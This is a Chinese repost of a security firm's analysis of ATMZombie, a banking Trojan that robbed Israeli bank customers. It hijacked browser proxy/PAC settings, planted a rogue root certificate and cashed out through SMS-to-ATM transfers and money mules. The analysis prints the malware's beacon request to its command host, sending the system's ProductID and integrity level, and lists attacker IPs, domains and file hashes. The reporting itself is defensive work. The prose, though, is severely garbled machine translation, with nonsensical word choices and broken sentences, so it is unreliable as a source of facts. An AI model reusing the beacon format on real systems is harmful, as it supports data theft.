ATM僵尸:第一款窃取以色列银行金钱的木马

2015年11月,卡巴斯基探索室的探索全体员工找到了本人银行骑着-ATM僵尸。,它被以为是第一款可以从以色列银行窃取制造硬币的歹意软件。它运用狡诈的交织的和对立面多效能的。、潜入连结。第一种办法称为代劳改建。,经用于HTTP包检测,它触及修正浏览图书报刊者代劳施展。、捕捉客户端和满足必要的流量、作为中间人在本人人的罢中。

固然考查不常见的无效,只泄露银行音讯决不是的轻易。。银行运用编密码两幢房屋私下的间隔,担保证实署名,使无效创纪录的从亮流中播送。只,罢者找到了可以敷的座位。,他们可以在打败了的选手的机具前述的说他们本身的证实。,此证实嵌入量管中并拔出到TH的根中。 在CA列表中。

敷代劳改建特洛伊骑着不正当的收购银行置信,巴西的体系烦人的事在积极地运用这种办法。。只,直到2012,卡巴斯基探索室的探索全体员工只述说了使整合的罢剖析。。卡巴斯基探索室高研法比奥 Assolini在他的文字中说:巴西特洛伊骑着的歹意软件PAC自2009以后一向流传。,分别的特洛伊骑着,如URL传染的机具,开端逼迫P。”

atmzombie_eng_1.png

卡巴斯基探索室的探索员着陆俄罗斯帝国的形势写了一篇和骑着罢PSB-retail客户批准的文字,这种罢叫托切尼耶。 Banker。该公司甚至假装成倒退诉讼探索的打败了的选手。,这种方法解说了罢者到何种地步诈骗打败了的选手并把持他的打败了的选手。。

以色列银行事情和下面的规律批准,只偷钱的方法不常见的风趣和新鲜。。新办法不依赖于径直的有线播送或市DOCU。,这是本人敷银行在线效能的穴。,从自发的出纳机取钱,帮助不太变明朗任务规律的罢者窃取制造硬币,到这地步骑着高位ATM僵尸。。

atmzombie_eng_2.png

这种似将发生在银行歹意软件领土不常见的快的。,由于它还对齐了以下骑着实地的:Corebot, PkyBOT和最新AndroidLocker。只是,没大人物运用同族关系的技术来罢。。不过,这种办法已被探索全体员工顺风的。,非常在线欺诈服务性的运用这种办法。,歹意软件编密码,如歹意软件、信用卡让经销等。

2012年,类似物地PSB批发罢的特洛伊骑着 Banking 骑着去岁8月被Paloalto体系找到,骑着就像本人ATM僵尸兄弟们。它象征本人不在于ATM僵尸打中额定以雾包围。 装载机方便之门。对立面类似物的银行特洛伊骑着是IBM 承销人被认定为筑波。

代劳施展寄给报社必然的毫不含糊其目的的项目。,因而它可以很轻易锁定。这次罢成地摧残了许许多多的打败了的选手。,但卡巴斯基探索室只追踪其打中十多个。。

概览

特洛伊骑着进入打败了的选大哥大具,话说回来开端投掷迅速移动。。一次经用的浏览图书报刊者(睁开), Firefox)解锁它记忆力的证实,并修正其施展以婚配中间人罢。它脱掉了拿可能性的代劳,而不是歹意软件。,话说回来将缓存动力更反而只读。。它缺勤持续运用Base64编密码字母串修正对齐表项。,下面所说的事对齐表项象征本人自发的施展使满足(如 运用CAP寄给报社式的流量捕捉制约)的渠道话说回来使勃起本身的署名证实到根目录中。后头,它期待打败了的选手登录到他的银行账目并行窃。,因此运用其决议的日记,话说回来敷短信效能向ATM僵尸发送资产。

ATMZombie-768x481.png

剖析

装填歹意软件后,演技您最爱情的编辑顺序剖析,它可以在运转时捕捉挂名的散布迅速移动。。在完完整全地的下订单点装填断点将显示DECO。。一旦最大的行动方向结尾,MZ头将出如今内存中。有很多技术和器可以做到这点。,只这种办法足以解开歹意软件。。

atmzombie_eng_4.png

检查歹意软件的缀编密码,朕可以辨认嵌入在创纪录的块打中稍微字母串。。朕最前部找到的是Base64字母串。,它象征稍微内容表达的URL,这吝啬的它被嵌入到对齐表项中。。

atmzombie_eng_5.png

字母串解码:

脚注:这不是嵌入在浏览图书报刊者体系施展打中PAC寄给报社。,因而朕置信这是本人罢者使产生的伴奏。,使无效原始PAC生效。

atmzombie_eng_1111.png

朕找到的其余的两个Base64字母串是PAC。,嵌入浏览图书报刊者体系施展;可供选择的事物典型的URL表现由Atac选择的横向乐章的典型。。

atmzombie_eng_6.png

Base64字母串打中URL被添加到HTTP查问中。,他被检测为沙盒指印辨认的尝试。。空参量是Windows ProductID、二元系决议与1到5私下的概数反应。此概数是歹意软件失去的使整合性顺序。,到站的,(1)非相信扣押,(5)体系级。这三个定态值是定态版本值。。

GET

/z/[WindowsProductID]&ver=0000002&name=[malware_filename]&ilvl=[integrity_level] HTTP/1.1

Host: retsback.com

Cache-Control: no-cache

经过检查二元系流,朕找到它运用证实来经过HTTPS和窃取创纪录的。。

atmzombie_eng_7.png

将前述的证实和代劳嵌入到为祭祀杀死的动物机具上,当上当者决议登录他的银行时,浏览图书报刊者被设置为经过罢者的满足必要路由表达。。

罢者不光设圈套作为以色列银行客户的打败了的选手下载歹意软件,对特派银行用户的罢。这必要本人好的智能打电话技术或内容职员来终止梳理。。在黑客搜集本人列表后头,全体的罢将不常见的无效。,罢者可以定做每个电子邮件或关系罢特派打败了的选手或禁令。。

以下是歹意软件的伪密码:

atmzombie_eng_8.png

走出猎兔 hole

歹意软件是罢的第一步。。其次步包含人工作用进入罢记述。,话说回来把钱转变成杂交种动物的账目上。这是不常见的坩埚的一步。,由于跨度这步吝啬的歹意软件成结尾了它的功能。

人工作用登录上当者的银行账目不克不及漫不经心。。全世界的银行都在运用指印器材来确保用户。在流行中的未必有器材,银行将拿来伸开终止工作设施机制以使无效受委托的罢。其余的,银行顺风的对其终止工作全体员工的非常警报。

atmzombie_eng_9.png

在银行的倒退群像颁布发表用户的降低价钱垄断,罢者将向Mule Mure的细胞PHO述说资产转变下订单。。朕把这种钱叫做杂交种动物僵尸,在考察中,朕找到少年们被诱进ATM支付现钞。,话说回来他们推进一小部分作为劝告。后头,罢者经过有区别的的中间收购下剩的资产,譬如邮政。。参战被命名为制造硬币杂交种动物(钱)。 骡)及其运用的技术。

Tips:钱骡(钱) mule)指经过因特网将用诈骗等不正当手段从一国得来的钱款和高价钱负荷转变到另一国的人,所在国通常是躲避的寓居地。。

此技术容许罢者饲料隐姓埋名,并可以监督W。。这也使知晓了一种新的罢方法。,换句话说,罢者把持下面所说的事民族的常存于内存中的作为内容人。。这般的服务性的可能性会领到其演技人被控告犯有罪行。,只是,证实他们变卖全体的作用的可能性性差一点为零。。结果,他们做的决不是的坏。

经过显示银行的提示,非对齐用户可以探索五岁的奇形怪状。。下面所说的事奇形怪状高位SMS。 市短信市,这一办法在过来的几年中推进了广延的的敷。,举个诉讼,它容许双亲给缺勤信用卡的孩子寄钱。。

担保的SMS音讯也象征了稍微特约稿的音讯。,作为日期,以色列身份证,姓名和大哥大保留者。

卡巴斯基探索室找到了一种新的办法来使无效早已在的代劳改建。。项目在在这里被戳记。。

以色列银行运用卡巴斯基探索室的在四周罢者、歹意参战与自找苦吃的人音讯和创纪录的的成了望。

FAQs

问:罢者的目的是以色列银行?

答:是的

问:罢者从打败了的选手账目或银行偷了钱吗?

答:自找苦吃的人账目上的钱被偷了,但银行替某人付款了拿打败了的选手。。因而,银行的终极花钱的东西。

问:罢完整终止了吗?

答:据朕了解,银行可以完整使无效罢和使均衡打败了的选手。。

问:有某些数量用户遭到罢?

答:卡巴斯基终止工作网显示,有十名打败了的选手。,只,朕报价打败了的选手人数将遂愿近200人。。

问:罢者偷了某些数量钱?

答:非常好转变率约为750美钞。。朕还能找到很多钱杂交种动物,大概有十种有区别的的歹意二元系寄给报社。,非常银行用户受到罢。。着陆这些奇形怪状,朕找到在过了一阵子数十万美钞被盗。。设想卡巴斯基探索室缺勤终止大规模考察,不义之财数额可能性急剧休会。。

问:警察厕足其间考察了吗?

答:朕不变卖考察的特殊情况。。

问:罢者终于是谁?

答:卡巴斯基探索室缺勤找到罢者,只,该公司的探索全体员工已将拿音讯发使进入执法机关。,我打算他们能诱惹这次事情支持的歹徒。。

问:朕能做些什么来终止工作设施朕的账目?

答:确保你早已使勃起了反歹意软件产品并使勃起了。

IP地址:

91.230.211.206

185.86.77.153

91.215.154.90

88.214.236.121

域:

retsback.com

updconfs.com

systruster.com

msupdcheck.com

范本:

6d11090c78e6621c21836c98808ff0f4 Trojan-Banker.Win32.Capper.zym
4c5b7a8187475be251d05655edcaccbe Trojan-Banker.Win32.Capper.zyt
c0201ab2a45bc0e17ebd186059d5a59e Trojan-Banker.Win32.Capper.zyk
47b316e3227d618089eb1625c4202142 Trojan-Banker.Win32.Capper.zyl
84bb5a77e28b3539a8022bc3612d4f4c PAC file example
d2bf165284ab1953a96dfa7b642637a8 Trojan-Banker.Win32.Capper.zyp
80440e78a68583b180ad4d3e9a676a6e Trojan-Banker.Win32.Capper.zyq
d08e51f8187df278296a8c4ff5cff0de Trojan-Banker.Win32.Capper.zyg
efa5ea2c511b08d0f8259a10a49b27ad Trojan-Banker.Win32.Capper.zys
13d9352a27b626e501f5889bfd614b34 Trojan-Banker.Win32.Capper.zyf
e5b7fd7eed59340027625ac39bae7c81 Trojan-Banker.Win32.Capper.zyj

* 翻阅寻求来源,FB体式的FB编辑,重印请从FriBuf黑客和遗传畸形提示

发表评论

电子邮件地址不会被公开。 必填项已用*标注